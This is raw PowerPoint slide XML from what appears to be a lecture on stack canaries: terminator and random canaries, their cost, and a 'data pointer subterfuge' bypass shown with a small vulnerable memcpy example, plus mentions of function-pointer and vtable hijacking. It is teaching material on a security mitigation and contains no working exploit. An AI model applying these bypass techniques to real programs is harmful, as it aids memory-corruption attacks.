          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
              <a:t>Compiled with v4.6.1:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>fstack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>-protector -O1 …</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="28" name="Straight Arrow Connector 27"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8764409" y="3323402"/>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Slide Number Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="404569228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Canary </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>hould be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>HARD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to Forge</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Terminator Canary</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>4 bytes: 0,CR,LF,-1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>(low-&gt;high)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>terminate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>gets()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Random Canary</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>4 random bytes chosen at load time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>stored in a guarded page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>need good randomness</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="333043278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Canary Scorecard</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4149039"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="1737360"/>
          <a:ext cx="8229600" cy="3383280"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{FABFCF23-3B69-468F-B69F-88F6DE6A72F2}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2438400"/>
                <a:gridCol w="5791200"/>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
                        <a:t>Aspect</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
                        <a:t>Canary</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
                        <a:t>Performance</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="285750" indent="-285750">
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
                        <a:t>several</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> instructions per function</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="285750" indent="-285750">
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>time: a few percent on average</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="285750" indent="-285750">
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>size: can optimize away in safe functions</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="2400" baseline="0" dirty="0" smtClean="0"/>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>          (but see MS08-067 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" baseline="0" dirty="0" smtClean="0">
                          <a:sym typeface="Wingdings"/>
                        </a:rPr>
                        <a:t>*</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
                        <a:t>Deployment</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="285750" indent="-285750">
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>recompile suffices; no code change</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
                        <a:t>Compatibility</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="285750" indent="-285750">
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
                        <a:t>perfect</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>—invisible to outside</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>Safety Guarantee</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="285750" indent="-285750">
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" i="1" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>not really…</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="148977" y="6297638"/>
            <a:ext cx="8828058" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>* http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>blogs.technet.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>/b/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>srd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>/archive/2009/03/16/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>gs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>-cookie-protection-effectiveness-and-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>limitations.aspx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="223269673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Bypass: Data Pointer Subterfuge</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1371600"/>
            <a:ext cx="6324600" cy="4754563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Overwrite a data pointer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>first</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>[64];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>memcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, user1);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> = user2;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Table 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2037326067"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6525590" y="2286000"/>
          <a:ext cx="1461558" cy="3715806"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5940675A-B579-460E-94D1-54222C63F5DA}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1461558"/>
              </a:tblGrid>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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>ebp</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="367246">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>CANARY</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="367246">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>ptr</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="2246822">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>buf</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t/>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>(64</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> bytes)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="b">
                    <a:solidFill>
                      <a:schemeClr val="accent2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Arc 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6158395" y="2653194"/>
            <a:ext cx="685800" cy="882548"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 5305641"/>
              <a:gd name="adj2" fmla="val 16471755"/>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B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="61139338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Canary Weakness</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>heck does </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> happen until epilogue…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> subterfuge</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>C++ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vtable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> hijack</a:t>
            </a:r>
